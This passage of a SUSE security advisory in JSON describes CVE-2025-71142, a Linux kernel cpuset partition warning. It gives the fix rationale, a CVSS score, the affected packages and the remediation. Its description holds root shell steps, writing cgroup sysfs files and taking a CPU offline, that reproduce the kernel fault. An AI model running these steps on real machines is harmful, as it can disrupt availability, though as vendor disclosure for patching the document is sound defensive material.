"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71141"
},
{
"cve": "CVE-2025-71142",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71142"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncpuset: fix warning when disabling remote partition\n\nA warning was triggered as follows:\n\nWARNING: kernel/cgroup/cpuset.c:1651 at remote_partition_disable+0xf7/0x110\nRIP: 0010:remote_partition_disable+0xf7/0x110\nRSP: 0018:ffffc90001947d88 EFLAGS: 00000206\nRAX: 0000000000007fff RBX: ffff888103b6e000 RCX: 0000000000006f40\nRDX: 0000000000006f00 RSI: ffffc90001947da8 RDI: ffff888103b6e000\nRBP: ffff888103b6e000 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000001 R11: ffff88810b2e2728 R12: ffffc90001947da8\nR13: 0000000000000000 R14: ffffc90001947da8 R15: ffff8881081f1c00\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f55c8bbe0b2 CR3: 000000010b14c000 CR4: 00000000000006f0\nCall Trace:\n \u003cTASK\u003e\n update_prstate+0x2d3/0x580\n cpuset_partition_write+0x94/0xf0\n kernfs_fop_write_iter+0x147/0x200\n vfs_write+0x35d/0x500\n ksys_write+0x66/0xe0\n do_syscall_64+0x6b/0x390\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\nRIP: 0033:0x7f55c8cd4887\n\nReproduction steps (on a 16-CPU machine):\n\n # cd /sys/fs/cgroup/\n # mkdir A1\n # echo +cpuset \u003e A1/cgroup.subtree_control\n # echo \"0-14\" \u003e A1/cpuset.cpus.exclusive\n # mkdir A1/A2\n # echo \"0-14\" \u003e A1/A2/cpuset.cpus.exclusive\n # echo \"root\" \u003e A1/A2/cpuset.cpus.partition\n # echo 0 \u003e /sys/devices/system/cpu/cpu15/online\n # echo member \u003e A1/A2/cpuset.cpus.partition\n\nWhen CPU 15 is offlined, subpartitions_cpus gets cleared because no CPUs\nremain available for the top_cpuset, forcing partitions to share CPUs with\nthe top_cpuset. In this scenario, disabling the remote partition triggers\na warning stating that effective_xcpus is not a subset of\nsubpartitions_cpus. Partitions should be invalidated in this case to\ninform users that the partition is now invalid(cpus are shared with\ntop_cpuset).\n\nTo fix this issue:\n1. Only emit the warning only if subpartitions_cpus is not empty and the\n effective_xcpus is not a subset of subpartitions_cpus.\n2. During the CPU hotplug process, invalidate partitions if\n subpartitions_cpus is empty.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71142",
"url": "https://www.suse.com/security/cve/CVE-2025-71142"
},
{
"category": "external",
"summary": "SUSE Bug 1256748 for CVE-2025-71142",
"url": "https://bugzilla.suse.com/1256748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
